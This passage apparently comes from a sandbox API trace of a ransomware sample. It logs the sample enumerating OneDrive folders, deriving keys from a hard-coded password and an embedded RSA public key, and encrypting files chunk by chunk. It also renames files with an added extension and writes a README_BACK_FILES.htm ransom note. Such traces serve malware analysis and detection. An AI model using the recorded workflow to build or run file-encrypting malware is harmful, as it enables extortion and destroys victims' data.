"c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.278] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.279] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.281] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.283] CryptDestroyHash (hHash=0x2fa748) returned 1 [0279.283] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.283] CryptReleaseContext (hProv=0x2f2d9b8, dwFlags=0x0) returned 1 [0279.283] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.283] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0279.283] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\readme_back_files.htm")) returned 0xffffffff [0279.283] AreFileApisANSI () returned 1 [0279.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0279.283] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.285] GetFileType (hFile=0x5d4c) returned 0x1 [0279.285] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.286] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.286] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa748 [0279.289] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.289] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.289] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.289] GetLastError () returned 0x0 [0279.289] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.290] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.290] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.291] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.293] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.294] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d138) returned 1 [0279.296] CryptCreateHash (in: hProv=0x2f2d138, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.296] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0279.297] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.297] CryptDeriveKey (in: hProv=0x2f2d138, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.297] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.297] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.297] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2dc60) returned 1 [0279.297] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2dc60, dwCertEncodingType=0x1, pInfo=0x2f37300*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37330*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37338*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc108) returned 1 [0279.297] CryptEncrypt (in: hKey=0x2fc108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.298] CryptEncrypt (in: hKey=0x2fc108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2dd70*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2dd70*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.298] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2dd70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2dd70*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.301] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.301] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.302] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.302] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.303] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.303] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.303] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.303] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.303] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.303] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.316] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.316] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.317] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.317] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.317] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.317] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.317] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.317] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.318] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.318] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.318] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.318] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.318] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.319] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.319] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.319] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.319] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.319] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.319] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.319] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.320] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.320] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.320] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.320] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.320] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.320] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.321] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, 